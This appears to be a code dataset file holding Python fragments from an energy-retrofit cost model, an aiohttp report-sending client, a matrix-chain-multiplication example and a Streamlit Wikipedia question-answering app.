(1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption", "get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float the total energy produced", "self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption *", "np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH", "cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline", "these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF", "Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas", "household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption", "init_LP : float initial propane consumption init_kWh : float initial electric consumption \"\"\"", "np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption :", "= int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each", "s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption", "total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total consumption Parameters ----------", "that can be retrofit savings_HF : float savings in heating oil consumption savings_wood", "oil consumption init_wood : float initial heating cordwood consumption init_gas : float initial", "electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast", "\"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory):", "s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption", "calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total", "== False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason", "= \"Not a residential project.\" return # needed for electric or HF component", "the # of households for the first year of the project Attributes ----------", "self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility", "\"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def", "price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas", "retrofit as of 2010, the performance improvements as a percentage of the pre-retrofit", "= self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line", "Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential:", "factor Returns ------- float: fuel consumed for a type of fuel \"\"\" HH_consumption", "\"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption", "\"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years,", "self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if", "total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\", "= kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate", "\"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption", "Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating", "(gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil", "\"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\",", "needed for electric or HF component and has a default value self.calc_avg_consumption() if", "Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating", ".ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price =", "years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv in directory", "= np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH,", "annual heating savings created by the project Attributes ---------- annual_heating_savings : np.array heating", "for this component to run. Parameters ---------- scalers : dictionary of valid scalers,", "valid scalers, optional Scalers to adjust normal run variables. See note on accepted", "= b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption *", "s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio =", "self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price", "= int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con =", "np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df", "self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas", "#~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0", "int Houses that can be retrofit savings_HF : float savings in heating oil", "\"calculate Houses to retrofit was negative, setting to 0\" ) ## % as", "\"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost", "(gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating", "self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption()", "prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def", "Initial value: 'community' section of community_data comp_specs : dictionary component specific data for", "cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price =", "forecast module, see information on Forecast Object aaem.diagnostics : diagnostics module, see information", "np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "= \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption =", "savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH", "Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\":", "self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh", "($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass df =", "self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) >", "self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost", "self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs'])", "(1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def", ") yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total", "- r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio", "init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption" ]
[ "if self._session is None: raise Exception('Not in context block') post_kwargs = dict( json=report_data,", "%s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp:", "POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as", "smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except", "resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report to {!r}:", "async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as", "= 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def", "client_session self._report_url = report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data,", "as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class", "class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session =", "in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token '", "assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None:", "is None: raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept':", "post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient:", "report_url') if self._session is None: raise Exception('Not in context block') post_kwargs = dict(", "pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session", "self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status()", "class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url", "OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token", "with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e:", "self._session is None: raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={", "'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with", "with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response:", "logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception):", "}, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data))", "Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with", "<gh_stars>0 from aiohttp import ClientSession from logging import getLogger from reprlib import repr", "%r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report to", "report_url, report_token): self._session = client_session self._report_url = report_url self._report_token = report_token async def", "dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending", "30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self,", "pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url =", "import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception):", "try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception", "logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report", "'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST", "class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session,", "+ self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s',", "__init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token = report_token", "def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if", "report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url,", "logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async", "getLogger from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30", "from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class", "self._report_url = report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict)", "send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session", "getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class", "reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError", "report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is", "raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context block') post_kwargs", "logging import getLogger from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s", "self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise", "import getLogger from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s =", "isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise", "not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context", "def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token =", "self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context block')", "dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not", "context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' +", "**post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed", "raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization':", "OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session", "Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token", "ClientSession from logging import getLogger from reprlib import repr as smart_repr logger =", "' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload:", "report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No", "= report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if", "report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not", "async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url')", "post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, },", "resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report to {!r}: {!r}'.format(self._report_url,", "= dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s)", "repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass", "headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report", "'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s", "smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError", "import ClientSession from logging import getLogger from reprlib import repr as smart_repr logger", "%s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp)", "OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context block') post_kwargs =", "self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url,", "aiohttp import ClientSession from logging import getLogger from reprlib import repr as smart_repr", "self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url:", "OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url,", "'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report -", "except Exception as e: raise OverwatchClientReportError('Failed to post report to {!r}: {!r}'.format(self._report_url, e))", "report_token): self._session = client_session self._report_url = report_url self._report_token = report_token async def send_report(self,", "as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to", "= getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass", "resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post", "client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token = report_token async", "json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch", "timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try:", "None: raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json',", "if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in", "= client_session self._report_url = report_url self._report_token = report_token async def send_report(self, report_data): assert", "block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token,", "- POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs)", "(Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token):", "from logging import getLogger from reprlib import repr as smart_repr logger = getLogger(__name__)", "payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r',", "= report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise", "from aiohttp import ClientSession from logging import getLogger from reprlib import repr as", "self._session = client_session self._report_url = report_url self._report_token = report_token async def send_report(self, report_data):", "(Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url" ]
[ "arr = [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number of", "1] * p[k] * p[j]) if count < _min: _min = count #", "2, 3, 4, 3] n = len(arr) print(\"Minimum number of multiplications is \",", "''' if i == j: return 0 _min = sys.maxsize # place parenthesis", "''' Matrix A[i] has dimension p[i-1] x p[i] for i = 1..n '''", "Matrix A[i] has dimension p[i-1] x p[i] for i = 1..n ''' if", "test above function arr = [1, 2, 3, 4, 3] n = len(arr)", "between first and last matrix, # recursively calculate count of # multiplications for", "k + 1, j) + p[i - 1] * p[k] * p[j]) if", "for k in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k", "of # multiplications for each parenthesis # placement and return the minimum count", "each parenthesis # placement and return the minimum count for k in range(i,", "calculate count of # multiplications for each parenthesis # placement and return the", "sys def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x p[i]", "minimum count for k in range(i, j): count = (MatrixChainOrder(p, i, k) +", "return _min # Driver program to test above function arr = [1, 2,", "if i == j: return 0 _min = sys.maxsize # place parenthesis at", "1..n ''' if i == j: return 0 _min = sys.maxsize # place", "multiplications for each parenthesis # placement and return the minimum count for k", "first and last matrix, # recursively calculate count of # multiplications for each", "# recursively calculate count of # multiplications for each parenthesis # placement and", "placement and return the minimum count for k in range(i, j): count =", "in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1,", "4, 3] n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1,", "p[i] for i = 1..n ''' if i == j: return 0 _min", "+ MatrixChainOrder(p, k + 1, j) + p[i - 1] * p[k] *", "p[i-1] x p[i] for i = 1..n ''' if i == j: return", "last matrix, # recursively calculate count of # multiplications for each parenthesis #", "i, k) + MatrixChainOrder(p, k + 1, j) + p[i - 1] *", "to test above function arr = [1, 2, 3, 4, 3] n =", "# multiplications for each parenthesis # placement and return the minimum count for", "place parenthesis at different places # between first and last matrix, # recursively", "# Return minimum count return _min # Driver program to test above function", "places # between first and last matrix, # recursively calculate count of #", "0 _min = sys.maxsize # place parenthesis at different places # between first", "sys.maxsize # place parenthesis at different places # between first and last matrix,", "n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1, n -", "count for k in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p,", "i = 1..n ''' if i == j: return 0 _min = sys.maxsize", "== j: return 0 _min = sys.maxsize # place parenthesis at different places", "above function arr = [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum", "= (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) + p[i -", "3, 4, 3] n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr,", "j: return 0 _min = sys.maxsize # place parenthesis at different places #", "= 1..n ''' if i == j: return 0 _min = sys.maxsize #", "Driver program to test above function arr = [1, 2, 3, 4, 3]", "if count < _min: _min = count # Return minimum count return _min", "k in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k +", "(MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) + p[i - 1]", "i, j): ''' Matrix A[i] has dimension p[i-1] x p[i] for i =", "parenthesis # placement and return the minimum count for k in range(i, j):", "# Driver program to test above function arr = [1, 2, 3, 4,", "p[k] * p[j]) if count < _min: _min = count # Return minimum", "return 0 _min = sys.maxsize # place parenthesis at different places # between", "<gh_stars>1-10 import sys def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1]", "different places # between first and last matrix, # recursively calculate count of", "+ 1, j) + p[i - 1] * p[k] * p[j]) if count", "i == j: return 0 _min = sys.maxsize # place parenthesis at different", "count return _min # Driver program to test above function arr = [1,", "p[i - 1] * p[k] * p[j]) if count < _min: _min =", "# placement and return the minimum count for k in range(i, j): count", "and return the minimum count for k in range(i, j): count = (MatrixChainOrder(p,", "Return minimum count return _min # Driver program to test above function arr", "dimension p[i-1] x p[i] for i = 1..n ''' if i == j:", "k) + MatrixChainOrder(p, k + 1, j) + p[i - 1] * p[k]", "and last matrix, # recursively calculate count of # multiplications for each parenthesis", "j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) +", "the minimum count for k in range(i, j): count = (MatrixChainOrder(p, i, k)", "j) + p[i - 1] * p[k] * p[j]) if count < _min:", "has dimension p[i-1] x p[i] for i = 1..n ''' if i ==", "count of # multiplications for each parenthesis # placement and return the minimum", "< _min: _min = count # Return minimum count return _min # Driver", "minimum count return _min # Driver program to test above function arr =", "for i = 1..n ''' if i == j: return 0 _min =", "_min # Driver program to test above function arr = [1, 2, 3,", "1, j) + p[i - 1] * p[k] * p[j]) if count <", "program to test above function arr = [1, 2, 3, 4, 3] n", "MatrixChainOrder(p, k + 1, j) + p[i - 1] * p[k] * p[j])", "_min = count # Return minimum count return _min # Driver program to", "- 1] * p[k] * p[j]) if count < _min: _min = count", "= len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1, n - 1))", "matrix, # recursively calculate count of # multiplications for each parenthesis # placement", "[1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number of multiplications is", "_min: _min = count # Return minimum count return _min # Driver program", "= [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number of multiplications", "# between first and last matrix, # recursively calculate count of # multiplications", "# place parenthesis at different places # between first and last matrix, #", "3] n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1, n", "= count # Return minimum count return _min # Driver program to test", "at different places # between first and last matrix, # recursively calculate count", "count < _min: _min = count # Return minimum count return _min #", "count # Return minimum count return _min # Driver program to test above", "parenthesis at different places # between first and last matrix, # recursively calculate", "* p[k] * p[j]) if count < _min: _min = count # Return", "A[i] has dimension p[i-1] x p[i] for i = 1..n ''' if i", "_min = sys.maxsize # place parenthesis at different places # between first and", "def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x p[i] for", "x p[i] for i = 1..n ''' if i == j: return 0", "recursively calculate count of # multiplications for each parenthesis # placement and return", "j): ''' Matrix A[i] has dimension p[i-1] x p[i] for i = 1..n", "range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j)", "function arr = [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number", "* p[j]) if count < _min: _min = count # Return minimum count", "for each parenthesis # placement and return the minimum count for k in", "MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x p[i] for i", "p[j]) if count < _min: _min = count # Return minimum count return", "return the minimum count for k in range(i, j): count = (MatrixChainOrder(p, i,", "count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) + p[i", "import sys def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x", "= sys.maxsize # place parenthesis at different places # between first and last", "+ p[i - 1] * p[k] * p[j]) if count < _min: _min" ]
[ "<reponame>frederikgram/describe from .template_builders import * from .actions import * from .startup import *" ]
[ "1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as", "= e.options # take the first one from the list of ambiguous terms", "first one from the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0],", "the summary about the query from wikipedia\" results = wikipedia.search(query) # There could", "paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context =", "\"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty() query =", "e: ambiguous_terms = e.options # take the first one from the list of", "st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\",", "pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str)", "Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms =", "SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph", "wikipedia\" results = wikipedia.search(query) # There could be more than 1 due to", "to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms", "== '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\",", "question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide", "Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty() query", "def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result =", "start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\")", "TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\":", "\"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question", "= st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query)", "__name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration", "could be more than 1 due to Disambiguation issue try: 